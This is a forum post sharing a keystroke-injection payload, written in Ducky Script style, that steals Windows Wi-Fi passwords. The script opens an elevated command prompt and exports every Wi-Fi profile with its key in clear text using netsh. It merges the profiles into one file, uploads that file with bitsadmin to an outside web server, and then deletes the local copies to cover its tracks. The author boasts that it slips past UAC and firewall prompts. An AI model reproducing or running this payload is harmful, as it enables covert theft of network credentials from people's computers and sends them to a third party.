Jump to content

[Payload] Wi-Fi password stealer PAYLOAD with HTTP upload through BITSADMIN


crashie

Recommended Posts

Just made this little script/payload that exports the Wi-Fi passwords on Windows Vista/7/8 and combines and renames it to wipass.xml and then uploads via HTTP to a webserver running IIS with BITS extension.

This way there is no need to worry for UAC or stuff like that.. and since it's HTTP upload the firewall won't ask questions.. :P

Here's the script/payload:

DELAY 1000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING netsh wlan export profile folder=%USERPROFILE%\ key=clear 
ENTER 
DELAY 200
STRING copy /b %USERPROFILE%\*.xml %USERPROFILE%\wipass.xml
STRING bitsadmin /transfer uloaded /upload /priority HIGH http://server.com/upload/wipass.xml %USERPROFILE%\wipass.xml 
ENTER 
DELAY 2200 
STRING erase /Q %USERPROFILE%\*.xml 
ENTER 
DELAY 200 
STRING exit 
ENTER
Edited by crashie
formatting [code] tags
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...